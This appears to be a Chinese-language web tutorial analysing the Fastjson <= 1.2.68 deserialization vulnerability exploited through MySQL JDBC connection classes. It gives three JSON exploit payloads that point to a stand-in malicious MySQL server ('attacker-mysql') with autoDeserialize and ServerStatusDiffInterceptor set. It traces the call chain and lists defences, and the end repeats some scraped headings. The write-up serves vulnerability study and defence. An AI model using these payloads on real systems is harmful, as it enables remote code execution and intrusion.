Fastjson JDBC 调用链利用过程深入分析<\/h1>

1. 漏洞背景<\/h2>
Fastjson <= 1.2.68 存在反序列化漏洞，攻击者可以通过精心构造的JSON数据利用JDBC相关类实现远程代码执行。本教程将详细分析该漏洞的利用过程。<\/p>

2. 漏洞前提条件<\/h2>

Fastjson 版本 <= 1.2.68<\/li>
利用类必须是 expectClass 类的子类或实现类<\/li>

利用类不在Fastjson的黑名单中<\/li> <\/ol>

3. 漏洞原理<\/h2>

3.1 Fastjson 反序列化机制<\/h3>

Fastjson在反序列化时会调用checkAutoType()<\/code>函数检查目标类是否合法。当type为AutoCloseable时，会加载并返回对应的类。<\/p>

关键点：<\/p>


当expectClassFlag为true时，可以绕过部分安全检查<\/li>
恶意类必须继承AutoCloseable接口才能通过expectClass检查<\/li>
<\/ul>
3.2 绕过机制分析<\/h3>

第一次checkAutoType()<\/code>检查AutoCloseable类型<\/li>
第二次检查实际要加载的类时，由于expectClassFlag为true，可以绕过部分限制<\/li>
最终加载的类必须是AutoCloseable的子类才能通过检查<\/li>
<\/ol>
4. 漏洞利用过程<\/h2>
4.1 JDBC4Connection利用<\/h3>
测试代码<\/h4>
\/\/ 恶意MySQL服务器配置
<\/span><\/span><\/span><\/span>String payload =<\/span> "{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"com.mysql.jdbc.JDBC4Connection\",\"host\":\"attacker-mysql\",\"port\":3306,\"user\":\"user\",\"password\":\"pass\",\"databaseName\":\"test\",\"url\":\"jdbc:mysql:\/\/attacker-mysql:3306\/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor\",\"autoDeserialize\":\"true\",\"statementInterceptors\":\"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor\"}"<\/span>;<\/span>
<\/span><\/span><\/code><\/pre>利用流程<\/h4>

Fastjson解析JSON，首先识别AutoCloseable类型<\/li>
然后识别JDBC4Connection类型<\/li>
实例化JDBC4Connection对象时，会尝试连接MySQL服务器<\/li>
连接过程中会执行以下关键调用链：<\/li>
<\/ol>
ConnectionImpl.initializePropsFromServer()
-> handleAutoCommitDefaults()
-> setAutoCommit()
-> execSQL()
-> sendQueryString()
-> sendQueryPacket()
-> invokeQueryInterceptorsPre()
-> ServerStatusDiffInterceptor.preProcess()
-> populateMapWithSessionStatusValues()
-> 执行SHOW SESSION STATUS查询
-> ResultSetUtil.resultSetToMap()
-> 调用ResultSet.getObject()
<\/code><\/pre>

当autoDeserialize=true时，MySQL服务器返回的恶意序列化对象会被反序列化，导致RCE<\/li>
<\/ol>
4.2 LoadBalancedMySQLConnection利用<\/h3>
测试代码<\/h4>
String payload =<\/span> "{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"com.mysql.jdbc.LoadBalancedMySQLConnection\",\"host\":\"attacker-mysql\",\"user\":\"user\",\"password\":\"pass\",\"databaseName\":\"test\",\"url\":\"jdbc:mysql:\/\/attacker-mysql:3306\/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor\"}"<\/span>;<\/span>
<\/span><\/span><\/code><\/pre>利用流程<\/h4>

实例化LoadBalancedMySQLConnection对象<\/li>
调用LoadBalancedConnectionProxy.pickNewConnection()<\/li>
最终还是会创建ConnectionImpl对象<\/li>
后续流程与JDBC4Connection相同<\/li>
<\/ol>
4.3 LoadBalancedConnectionProxy利用<\/h3>
测试代码<\/h4>
String payload =<\/span> "{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"com.mysql.jdbc.LoadBalancedConnectionProxy\",\"host\":\"attacker-mysql\",\"user\":\"user\",\"password\":\"pass\",\"databaseName\":\"test\",\"url\":\"jdbc:mysql:\/\/attacker-mysql:3306\/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor\"}"<\/span>;<\/span>
<\/span><\/span><\/code><\/pre>利用流程<\/h4>

首先实例化ReplicationConnectionUrl对象封装连接参数<\/li>
然后进入LoadBalancedConnectionProxy初始化<\/li>
后续流程与上述两种方式相同<\/li>
<\/ol>
5. 关键点总结<\/h2>

expectClass绕过<\/strong>：利用AutoCloseable接口作为跳板，绕过Fastjson的类型检查<\/li>
JDBC连接触发<\/strong>：通过JDBC连接过程中的SQL查询触发反序列化<\/li>
autoDeserialize参数<\/strong>：必须设置为true才能自动反序列化服务器返回的数据<\/li>
statementInterceptors<\/strong>：通过拦截器在SQL执行前后插入恶意操作<\/li>
MySQL服务器构造<\/strong>：需要搭建恶意MySQL服务器返回精心构造的序列化对象<\/li>
<\/ol>
6. 防御措施<\/h2>

升级Fastjson到最新版本<\/li>
禁用autoDeserialize功能<\/li>
限制JDBC连接参数来源<\/li>
使用Fastjson的SafeMode<\/li>
<\/ol>
7. 调试技巧<\/h2>

重点关注checkAutoType()<\/code>函数的执行流程<\/li>
观察expectClassFlag的变化<\/li>
跟踪JDBC连接建立过程<\/li>
监控SQL查询执行链<\/li>
<\/ol>
通过以上分析，我们可以深入理解Fastjson JDBC调用链的利用过程，从而更好地防御此类漏洞。<\/p>

Fastjson JDBC 调用链利用过程深入分析<\/h1>

1. 漏洞背景<\/h2> Fastjson <= 1.2.68 存在反序列化漏洞，攻击者可以通过精心构造的JSON数据利用JDBC相关类实现远程代码执行。本教程将详细分析该漏洞的利用过程。<\/p>

3. 漏洞原理<\/h2>

4. 漏洞利用过程<\/h2>

4.1 JDBC4Connection利用<\/h3>

4.2 LoadBalancedMySQLConnection利用<\/h3>

4.3 LoadBalancedConnectionProxy利用<\/h3>

1. 漏洞背景<\/h2>
Fastjson <= 1.2.68 存在反序列化漏洞，攻击者可以通过精心构造的JSON数据利用JDBC相关类实现远程代码执行。本教程将详细分析该漏洞的利用过程。<\/p>